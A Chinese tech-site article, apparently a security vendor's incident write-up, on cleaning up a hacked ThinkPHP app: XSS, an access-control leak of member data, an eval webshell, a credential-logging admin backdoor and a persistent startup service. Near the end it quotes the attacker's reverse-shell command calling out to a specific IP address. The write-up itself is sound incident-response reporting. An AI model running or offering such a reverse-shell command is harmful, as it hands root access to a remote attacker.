當前位置:首頁 >  科技 >  IT業(yè)界 >  正文

網站被黑導致阿里云異常流量及異常網絡連接的安全解決過程

 2022-09-01 10:28  來源: A5用戶投稿   我來投稿 撤稿糾錯

  域名預訂/競價,好“米”不錯過

相信有很多站長以及運營網站或APP的技術人員都有一些安全上的困擾,尤其是對網站代碼里存在后門文件,以及服務器被植入木馬病毒的安全問題很鬧心,前段時間我們接到客戶的安全咨詢,說是找的第三方開發(fā)公司做的APP和后臺,運營了起來差不多3個月,一開始注冊的會員量不是很多,當注冊達到成千上萬個會員注冊量的時候,就相繼出現了安全上的問題,數據庫總是被篡改,會員信息泄露,以及被阿里云提示的云安全中心,安全事件提醒,尊敬的*玉:云盾云安全中心檢測到您的服務器:47.180.*.*(主服務器)出現了緊急安全事件:自啟動后門,建議您立即進行處理。進程異常行為-反彈Shell和異常網絡連接-反彈shell網絡外連以及惡意腳本代碼執(zhí)行還有Linux可疑命令序列惡意軟件-后門程序等告警,針對這些安全問題,我們來給大家科普一下,如何去除網站后門木馬以及代碼漏洞檢測等問題。

攻擊情況介紹:

當天我們收到客戶的電話咨詢,客戶的平臺、APP和H5端、以及后臺遭到黑客入侵,并篡改了數據庫里面的數據,導致平臺的損失過萬,詳細詢問了客戶的平臺架構以及部署的服務器數量,發(fā)現客戶用的是Thinkphp架構開發(fā),APP的API接口和H5端以及后臺管理都是在該架構的基礎上開發(fā)的,因為這套代碼是客戶從買來后找的第三方公司進行的二次開發(fā),第三方開發(fā)公司對里面的代碼后門并不清楚,很多低價賣源碼的,肯定是有利益可圖的。建議大家買來后一定要對網站源碼進行代碼安全審計和網站后門審計服務,尤其是對準備剛上線的APP平臺,對安全問題要重視起來,否則到了后期會員規(guī)模上來后,損失的就不止這一點了。

跟客戶進行了詳細的對接,梳理了所有的服務器的信息以及網站源碼的位置,我們的SINE安全工程師立即將代碼打包到本地,進行源代碼安全審計,通過對用戶注冊以及APP里的具體功能代碼,都進行了全面的人工漏洞測試,發(fā)現在留言反饋以及會員信息功能,存在XSS跨站漏洞,這個漏洞可以將XSS攻擊代碼植入到后臺里去,當后臺的管理人員查看了反饋的留言或用戶的個人詳情,就會直接觸發(fā)該XSS漏洞,XSS漏洞可以獲取到網站后臺的地址,以及管理員的Session和cookies,有了這2個值,黑客就可以登錄后臺了,對APP里的API接口也進行詳細的安全審計,發(fā)現存在會員信息泄露漏洞,由于未對UID值進行當前賬號權限判斷,可以越權查看其它UID的會員信息,像手機號以及注冊時間,銀行卡,錢包地址,密碼等等的信息,都可以越權查看,我們SINE安全工程師對代碼中的一些函數功能代碼進行審計,檢測出了源碼作者留的一句話木馬后門,而且還是加密形式免殺webshell,代碼如下:

真是道高一尺魔高一丈,源碼作者留的后門,手段非常高,一般的建站公司技術是沒辦法看出這個文件是木馬代碼的,我們對其網站的訪問日志以及APP的接口日志進行人工檢查,還發(fā)現了后臺登錄這里被黑客動了手腳,只要管理員登錄成功會立即把用戶名和密碼寫到/data/目錄下的robots.txt文件中,建議大家日后做檢查代碼的時候先搜索下_encode關鍵詞看看有沒有可疑的,以及搜索關鍵詞eval函數的都有哪些再調用,因為很多一句話木馬都是調用的eval函數,通過對每個代碼的安全審計發(fā)現上傳功能的代碼中存在上傳后門具體代碼如下:

后門真是太多了,防不勝防,辛虧客戶找到了我們SINE安全對網站代碼進行了詳細的安全審計和漏洞測試,我們對網站的上傳的目錄進行了腳本執(zhí)行權限控制,對eval的后門進行了強制刪除,以及對管理后臺登錄這里的后門進行了修復,對一些XSS跨站攻擊的代碼進行了攻擊防護,對所有get post變量提交的參數進行了安全過濾,凡是包含xss跨站代碼的,以及非法植入攻擊代碼的都進行了攔截過濾,并對整套代碼進行了安全加固與防護,也同時對服務器進行了端口安全策略部署和基礎安全設置,如注冊表權限,環(huán)境運行賬戶權限,mysql數據庫的權限分離設置,以及nginx的運行賬戶進行了設置,防止通過網站后門木馬進行提權拿到服務器權限,如果想要對網站代碼進行后門查找和清除和漏洞人工測試服務的可以向網站漏洞修復服務商SINE安全或鷹盾安全以及啟明星辰,大樹安全等這些服務商尋求技術支持。針對阿里云的云安全中心安全事件提醒,我們讓客戶提供了阿里云賬號和密碼,登錄后,對該安全事件的詳情進行了查看,發(fā)現確實是黑客植入了自啟動的后門,我們對Linux系統(tǒng)的自啟動服務進行了查看,發(fā)現黑客植入的木馬病毒,每次重啟服務器都會自動啟動該服務,向外發(fā)送連接請求,Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 該命令是直接反彈了Linux root SHELL到1.15.235.160黑客的服務器。我們對該IP進行了阿里云安全組IP限制,以及對系統(tǒng)里的自啟動服務進行了刪除與防篡改部署,至此客戶的APP被黑客攻擊以及篡改數據的問題得到了徹底的解決。也希望我們的解決過程分享,能幫到更多的人。

申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!

相關標簽
網站被黑
阿里云

相關文章

  • 近日,一大批網站被黑,我們如何應對和解決

    從上周開始,老賀發(fā)現很多兄弟們的網站突然被黑了,包括我們“半壁江山流量匯”中的兄弟。有些發(fā)現快的,還能來得及處理,而有些網站,因為發(fā)現慢,已經出現了排名完了,收錄被百度情況的問題!對此,老賀這里做了系統(tǒng)的信息收集,寫出這篇文章:1、被黑的系統(tǒng),本次被黑的系統(tǒng)既有windows系列的,也有l(wèi)inux相

  • 阿里云峰會發(fā)布《Well-Architected云卓越架構白皮書》:助力企業(yè)用好云管好云

    6月1日,2023阿里云峰會·粵港澳大灣區(qū)在廣州舉行,會上阿里云正式推出《云卓越架構白皮書》,為企業(yè)用云管云解決方案和產品化落地提供指引,助力企業(yè)構建更加安全、高效、穩(wěn)定的云架構。本書由阿里云架構師團隊、產品團隊、全球交付團隊等眾多團隊基于過去多年服務企業(yè)的經驗總結共同撰寫,從安全合規(guī)、穩(wěn)定性、成本

    標簽:
    阿里云

  • 性價比提升15%,阿里云發(fā)布第八代企業(yè)級計算實例g8a和性能增強型實例g8ae

    5月17日,2023阿里云峰會·常州站上,阿里云正式發(fā)布第八代企業(yè)級計算實例g8a以及性能增強性實例g8ae。兩款實例搭載第四代AMDEPYC處理器,標配阿里云eRDMA大規(guī)模加速能力,網絡延時低至8微秒。其中,g8a綜合性價比平均提升15%以上,g8ae算力最高提升55%,在AI推理與訓練、深度學

    標簽:
    阿里云

  • 阿里云分拆上市,張勇發(fā)聲了!

    5月18日晚,阿里巴巴集團董事會主席兼CEO、阿里云智能集團董事長兼CEO張勇向阿里云員工發(fā)出全員信。他表示,阿里云智能計劃在未來12個月將從阿里集團完全分拆,并完成上市,在股權和公司治理上形成一家與阿里集團完全獨立的新公司。同時,阿里云智能集團將引入外部戰(zhàn)略投資者。據阿里巴巴集團最新財報,阿里云智

    標簽:
    阿里云

  • 阿里云,在AI戰(zhàn)場鳴槍

    文/零度出品/節(jié)點商業(yè)組阿里史上最大一次組織變革后,內部傳達出一個信號:所有業(yè)務,只要干得好,都能獨立融資上市。一時間,市場眾說紛紜。對于誰將成為當前階段阿里體系第一個獨立上市的項目,大家都在猜測。由張勇帶隊的阿里云,成為市場最關注的獨立業(yè)務線。兩個線索,其一、阿里云已經在國內云服務第一的位置上良久

    標簽:
    阿里云
加載更多

熱門排行

信息推薦